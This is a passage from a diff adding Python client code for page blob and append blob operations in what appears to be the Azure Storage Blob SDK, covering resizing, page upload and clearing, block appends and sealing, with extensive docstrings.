self._client.page_blob.update_sequence_number(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _resize_blob_options(self, size, **kwargs): + # type: (int, **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if size is None: + raise ValueError("A content length must be specified for a Page Blob.") + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'blob_content_length': size, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def resize_blob(self, size, **kwargs): + # type: (int, **Any) -> Dict[str, Union[str, datetime]] + """Resizes a page blob to the specified size. + + If the specified value is less than the current size of the blob, + then all pages above the specified value are cleared. + + :param int size: + Size used to resize blob. Maximum size for a page blob is up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._resize_blob_options(size, **kwargs) + try: + return self._client.page_blob.resize(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _upload_page_options( # type: ignore + self, page, # type: bytes + offset, # type: int + length, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Any] + if isinstance(page, six.text_type): + page = page.encode(kwargs.pop('encoding', 'UTF-8')) + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + if offset is None or offset % 512 != 0: + raise ValueError("offset must be an integer that aligns with 512 page size") + if length is None or length % 512 != 0: + raise ValueError("length must be an integer that aligns with 512 page size") + end_range = offset + length - 1 # Reformat to an inclusive range index + content_range = 'bytes={0}-{1}'.format(offset, end_range) # type: ignore + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + seq_conditions = SequenceNumberAccessConditions( + if_sequence_number_less_than_or_equal_to=kwargs.pop('if_sequence_number_lte', None), + if_sequence_number_less_than=kwargs.pop('if_sequence_number_lt', None), + if_sequence_number_equal_to=kwargs.pop('if_sequence_number_eq', None) + ) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + validate_content = kwargs.pop('validate_content', False) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'body': page[:length], + 'content_length': length, + 'transactional_content_md5': None, + 'timeout': kwargs.pop('timeout', None), + 'range': content_range, + 'lease_access_conditions': access_conditions, + 'sequence_number_access_conditions': seq_conditions, + 'modified_access_conditions': mod_conditions, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def upload_page( # type: ignore + self, page, # type: bytes + offset, # type: int + length, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """The Upload Pages operation writes a range of pages to a page blob. + + :param bytes page: + Content of the page. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._upload_page_options( + page=page, + offset=offset, + length=length, + **kwargs) + try: + return self._client.page_blob.upload_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _upload_pages_from_url_options( # type: ignore + self, source_url, # type: str + offset, # type: int + length, # type: int + source_offset, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + # TODO: extract the code to a method format_range + if offset is None or offset % 512 != 0: + raise ValueError("offset must be an integer that aligns with 512 page size") + if length is None or length % 512 != 0: + raise ValueError("length must be an integer that aligns with 512 page size") + if source_offset is None or offset % 512 != 0: + raise ValueError("source_offset must be an integer that aligns with 512 page size") + + # Format range + end_range = offset + length - 1 + destination_range = 'bytes={0}-{1}'.format(offset, end_range) + source_range = 'bytes={0}-{1}'.format(source_offset, source_offset + length - 1) # should subtract 1 here? + + seq_conditions = SequenceNumberAccessConditions( + if_sequence_number_less_than_or_equal_to=kwargs.pop('if_sequence_number_lte', None), + if_sequence_number_less_than=kwargs.pop('if_sequence_number_lt', None), + if_sequence_number_equal_to=kwargs.pop('if_sequence_number_eq', None) + ) + source_authorization = kwargs.pop('source_authorization', None) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + source_mod_conditions = get_source_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + source_content_md5 = kwargs.pop('source_content_md5', None) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'copy_source_authorization': source_authorization, + 'source_url': source_url, + 'content_length': 0, + 'source_range': source_range, + 'range': destination_range, + 'source_content_md5': bytearray(source_content_md5) if source_content_md5 else None, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'sequence_number_access_conditions': seq_conditions, + 'modified_access_conditions': mod_conditions, + 'source_modified_access_conditions': source_mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def upload_pages_from_url(self, source_url, # type: str + offset, # type: int + length, # type: int + source_offset, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Any] + """ + The Upload Pages operation writes a range of pages to a page blob where + the contents are read from a URL. + + :param str source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int source_offset: + This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source. + The service will read the same number of bytes as the destination range (length-offset). + :keyword bytes source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._upload_pages_from_url_options( + source_url=self._encode_source_url(source_url), + offset=offset, + length=length, + source_offset=source_offset, + **kwargs + ) + try: + return self._client.page_blob.upload_pages_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _clear_page_options(self, offset, length, **kwargs): + # type: (int, int, **Any) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + seq_conditions = SequenceNumberAccessConditions( + if_sequence_number_less_than_or_equal_to=kwargs.pop('if_sequence_number_lte', None), + if_sequence_number_less_than=kwargs.pop('if_sequence_number_lt', None), + if_sequence_number_equal_to=kwargs.pop('if_sequence_number_eq', None) + ) + mod_conditions = get_modify_conditions(kwargs) + if offset is None or offset % 512 != 0: + raise ValueError("offset must be an integer that aligns with 512 page size") + if length is None or length % 512 != 0: + raise ValueError("length must be an integer that aligns with 512 page size") + end_range = length + offset - 1 # Reformat to an inclusive range index + content_range = 'bytes={0}-{1}'.format(offset, end_range) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'content_length': 0, + 'timeout': kwargs.pop('timeout', None), + 'range': content_range, + 'lease_access_conditions': access_conditions, + 'sequence_number_access_conditions': seq_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def clear_page(self, offset, length, **kwargs): + # type: (int, int, **Any) -> Dict[str, Union[str, datetime]] + """Clears a range of pages. + + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._clear_page_options(offset, length, **kwargs) + try: + return self._client.page_blob.clear_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _append_block_options( # type: ignore + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + if isinstance(data, six.text_type): + data = data.encode(kwargs.pop('encoding', 'UTF-8')) # type: ignore + if length is None: + length = get_length(data) + if length is None: + length, data = read_length(data) + if length == 0: + return {} + if isinstance(data, bytes): + data = data[:length] + + appendpos_condition = kwargs.pop('appendpos_condition', None) + maxsize_condition = kwargs.pop('maxsize_condition', None) + validate_content = kwargs.pop('validate_content', False) + append_conditions = None + if maxsize_condition or appendpos_condition is not None: + append_conditions = AppendPositionAccessConditions( + max_size=maxsize_condition, + append_position=appendpos_condition + ) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'body': data, + 'content_length': length, + 'timeout': kwargs.pop('timeout', None), + 'transactional_content_md5': None, + 'lease_access_conditions': access_conditions, + 'append_position_access_conditions': append_conditions, + 'modified_access_conditions': mod_conditions, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def append_block( # type: ignore + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """Commits a new block of data to the end of the existing append blob. + + :param data: + Content of the block. This can be bytes, text, an iterable or a file-like object. + :type data: bytes or str or Iterable + :param int length: + Size of the block in bytes. + :keyword bool validate_content: + If true, calculates an MD5 hash of the block content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._append_block_options( + data, + length=length, + **kwargs + ) + try: + return self._client.append_blob.append_block(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _append_block_from_url_options( # type: ignore + self, copy_source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + # If end range is provided, start range must be provided + if source_length is not None and source_offset is None: + raise ValueError("source_offset should also be specified if source_length is specified") + # Format based on whether length is present + source_range = None + if source_length is not None: + end_range = source_offset + source_length - 1 + source_range = 'bytes={0}-{1}'.format(source_offset, end_range) + elif source_offset is not None: + source_range = "bytes={0}-".format(source_offset) + + appendpos_condition = kwargs.pop('appendpos_condition', None) + maxsize_condition = kwargs.pop('maxsize_condition', None) + source_content_md5 = kwargs.pop('source_content_md5', None) + append_conditions = None + if maxsize_condition or appendpos_condition is not None: + append_conditions = AppendPositionAccessConditions( + max_size=maxsize_condition, + append_position=appendpos_condition + ) + source_authorization = kwargs.pop('source_authorization', None) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + source_mod_conditions = get_source_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'copy_source_authorization': source_authorization, + 'source_url': copy_source_url, + 'content_length': 0, + 'source_range': source_range, + 'source_content_md5': source_content_md5, + 'transactional_content_md5': None, + 'lease_access_conditions': access_conditions, + 'append_position_access_conditions': append_conditions, + 'modified_access_conditions': mod_conditions, + 'source_modified_access_conditions': source_mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + 'timeout': kwargs.pop('timeout', None)} + options.update(kwargs) + return options + + @distributed_trace + def append_block_from_url(self, copy_source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """ + Creates a new block to be committed as part of a blob, where the contents are read from a source url. + + :param str copy_source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int source_offset: + This indicates the start of the range of bytes (inclusive) that has to be taken from the copy source. + :param int source_length: + This indicates the end of the range of bytes that has to be taken from the copy source. + :keyword bytearray source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the + AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._append_block_from_url_options( + copy_source_url=self._encode_source_url(copy_source_url), + source_offset=source_offset, + source_length=source_length, + **kwargs + ) + try: + return self._client.append_blob.append_block_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _seal_append_blob_options(self, **kwargs): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + appendpos_condition = kwargs.pop('appendpos_condition', None) + append_conditions = None + if appendpos_condition is not None: + append_conditions = AppendPositionAccessConditions( + append_position=appendpos_condition + ) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + options = { + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'append_position_access_conditions': append_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def seal_append_blob(self, **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """The Seal operation seals the Append Blob to make it read-only. + + .. versionadded:: 12.4.0 + + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._seal_append_blob_options(**kwargs) + try: + return self._client.append_blob.seal(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _get_container_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) 